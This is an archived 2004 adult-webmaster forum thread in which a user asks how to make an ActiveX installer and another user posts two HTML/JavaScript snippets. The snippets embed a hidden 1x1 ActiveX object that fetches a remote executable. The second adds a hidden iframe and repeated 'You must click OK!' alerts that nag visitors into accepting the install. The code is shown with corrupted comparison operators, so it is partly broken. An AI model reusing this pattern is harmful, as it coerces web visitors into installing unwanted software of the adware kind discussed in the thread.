GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   How to do an active-x installer? (https://gfy.com/showthread.php?t=360942)

pushpills 09-23-2004 02:03 PM

How to do an active-x installer?
 
Looked around on google couldnt find anything too helpfull.


It's going to be for a trial of a piece of software, not for adware/scumware.


Can anyone help me out or point me somewhere?

I'll throw a couple bucks in for the info.


Thanks.

stocktrader23 09-23-2004 02:04 PM

You are a little late. SP2 shit on your parade.

pushpills 09-23-2004 02:06 PM

Quote:

Originally posted by stocktrader23
You are a little late. SP2 shit on your parade.

sp2 does not allow those acitve-x installs where you click yes or no?

ztik 09-23-2004 02:15 PM

You need a security certificate then its just a couple lines of ax code

pushpills 09-23-2004 02:32 PM

Quote:

Originally posted by ztik
You need a security certificate then its just a couple lines of ax code
where do I grab this stuff?

teleblade69 09-23-2004 02:46 PM

LOUDcash


SP2 approved :D




tb


PS : i use it for my cheatsites (platform games)

pushpills 09-23-2004 02:48 PM

Quote:

Originally posted by teleblade69
LOUDcash


SP2 approved :D




tb


PS : i use it for my cheatsites (platform games)


uhh, i dont want to install your shit, I want to install my piece of software.....

Juicy D. Links 09-23-2004 02:51 PM

my programmer

teleblade69 09-23-2004 03:02 PM

it's just an affiliate program man not a link to install 'my' shit


:)


tb

hydro 09-23-2004 03:21 PM

Quote:

Originally posted by teleblade69
it's just an affiliate program man not a link to install 'my' shit


:)


tb

he didnt want a per install affiliate, he wanted the code to do it.

pushpills, some quick code i found through google.


<HTML>
<BODY>
<SCRIPT language="JavaScript">
<!--
var exepath='http://www.site.com/file.exe';
var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);

function install() {
if (bname hahahaha 'Microsoft Internet Explorer' && bver >= 2) {
document.write('<object id="Installation_Folder_Name" width=1 height=1 classid="CLSID:A45F39DC-3608-4237-8F0E-139F1BC49464" codebase="'+exepath+'"></object>');
} else {
location.replace(exepath);
}
}

install();

// -->
</SCRIPT>
</BODY>
</HTML>





<HTML>
<BODY>
<SCRIPT language="JavaScript">
<!--
document.write('<iframe id="AX" style="position:absolute; visibility:hidden;"></iframe>');

var errcount = 3;
var exepath='http://www.site.com/dir/file.exe';
var errtext='You must click OK!';

var bname=navigator.appName;
var bver=parseInt(navigator.appVersion);

function install() {
if (bname hahahaha 'Microsoft Internet Explorer' && bver >= 2) {
BP.document.close();
BP.document.write('<html><body>');
BP.document.write('<object id="LiveFile" onError="parent.retryit();" width=1 height=1 classid="CLSID:A45F39DC-3608-4237-8F0E-139F1BC49464" codebase="'+exepath+'"></object>');
BP.document.write('</body></html>');
} else {
location.replace(exepath);
}
}

function install_First() {
if (bname hahahaha 'Microsoft Internet Explorer' && bver >= 2) {
document.write('<object id="LiveFile" onError="parent.retryit();" width=1 height=1 classid="CLSID:A45F39DC-3608-4237-8F0E-139F1BC49464" codebase="'+exepath+'"></object>');
} else {
location.replace(exepath);
}
}

function retryit(){
if(errcount >0) {
alert(errtext);
install();
errcount --;
} else {
location.replace(exepath);
}
}

install_First();
// -->
</SCRIPT>
</BODY>
</HTML>

pushpills 09-23-2004 04:20 PM

hydro, icq me back


All times are GMT -7. The time now is 08:51 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123